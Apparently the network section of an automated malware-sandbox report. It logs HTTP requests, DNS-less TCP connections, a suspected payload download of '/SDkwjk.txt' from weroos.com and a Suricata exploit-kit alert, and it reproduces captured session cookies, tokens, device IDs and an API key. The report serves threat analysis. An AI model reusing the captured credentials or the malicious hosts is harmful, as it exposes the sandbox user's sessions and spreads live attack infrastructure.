        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
        Source: global trafficHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1host: www.bing.comorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHcontent-type: text/xmlx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-search-cortanaavailablecapabilities: Nonex-search-safesearch: Moderatex-search-timezone: Bias=-60; StandardBias=0; TimeZoneKeyName=W. Europe Standard Time
        Source: global trafficHTTP traffic detected: GET /SDkwjk.txt HTTP/1.1Host: weroos.comConnection: Keep-Alive
        Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.16:49737 -> 20.83.18.132:443
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
        Source: C:\Temp\PyEnv\python.exeCode function: 26_2_00007FF8068A57E0 recv,26_2_00007FF8068A57E0
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: flexjjet.comupgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
        Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1host: flexjjet.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://flexjjet.com/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6ecookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDN9LFwiY2FtcGFpZ25zXCI6e1wiMTEzXCI6MTc0OTUwMjA0M30sXCJ0aW1lXCI6MTc0OTUwMjA0M30ifQ.io15MZ8hAmszvEd6-fhL5GBD-J4okyPU3j_xJ2ROQAEpriority: u=1, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=d&oit=1&cp=1&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ag5MNrHoG4V6seK&MD=DbLwmtSk HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duc&oit=1&cp=3&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duck&oit=1&cp=4&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckd&oit=1&cp=5&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /p/AF1QipOcojQD4D7HOKN2YcCUIAZxhlC_VhJ1BSt8DJkC=w92-h92-n-k-no HTTP/1.1host: lh3.googleusercontent.comsec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: emptysec-fetch-storage-access: activeuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduc&oit=1&cp=7&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduck&oit=1&cp=8&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /search?q=duckduckgo&oq=duckduc&pf=cs&sourceid=chrome&ie=UTF-8 HTTP/1.1host: www.google.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36purpose: prefetchsec-purpose: prefetchaccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7x-browser-channel: stablex-browser-year: 2025x-browser-validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=x-browser-copyright: Copyright 2025 Google LLC. All rights reserved.x-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduckg&oit=1&cp=9&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduckgo&oit=1&cp=10&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: AEC=AVh_V2glKdJsL8qB5wKoogb-I_6u4J3kdOtZkPQypjgtso0cUlMLsJhsJCIcookie: NID=524=I74YCtLTQkClDee4yhVezzkNvXF8Lh-4IZUjcui3A4xWjHqGBfm8JFfB59nzrS7FNpz2nNNYG3DI5lm2YtM8pj5DpufWDOj99RFsu_SoXaAopA7U4Z5Y1d2mS-D8IAruSAP9mMR1aKVtCMOMZZRfCzeT-dtWoIJAeIvD7rEOLSka-LmzKjFLQccsVvaArAfSw15GzsmQ1Ygv3qNTyMJLpriority: u=4, i
        Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=duckduckgo.com&oit=3&cp=14&pgcl=2&gs_rn=42&psi=gBP7qZPNO-2O8TcT&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1host: www.google.comx-client-data: CLbgygE=sec-fetch-site: nonesec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: AEC=AVh_V2glKdJsL8qB5wKoogb-I_6u4J3kdOtZkPQypjgtso0cUlMLsJhsJCIcookie: NID=524=I74YCtLTQkClDee4yhVezzkNvXF8Lh-4IZUjcui3A4xWjHqGBfm8JFfB59nzrS7FNpz2nNNYG3DI5lm2YtM8pj5DpufWDOj99RFsu_SoXaAopA7U4Z5Y1d2mS-D8IAruSAP9mMR1aKVtCMOMZZRfCzeT-dtWoIJAeIvD7rEOLSka-LmzKjFLQccsVvaArAfSw15GzsmQ1Ygv3qNTyMJLpriority: u=4, i
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1host: duckduckgo.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: nonesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
        Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-RegIt-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-Reg-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /_next/static/css/4f43f24a80f858fd.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /_next/static/css/cbe9deb940241e83.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-Sbold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-Bold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /static-assets/font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
        Source: global trafficHTTP traffic detected: GET /_next/static/css/b7b5059dc782a8cf.css HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/webpack-902dadd63ccf3ed3.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7331-e58a744914d0d2ab.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7522-0997b064ba451bfa.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/183-8cf06e00742c0795.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/1108-469b2dba26dd3aef.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/8375-2ff8f582fa9b0644.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/7018-71bf9d9d00512827.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/684-9f33fd7065606a5d.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/chunks/9409-ec79edf1a159066e.js HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
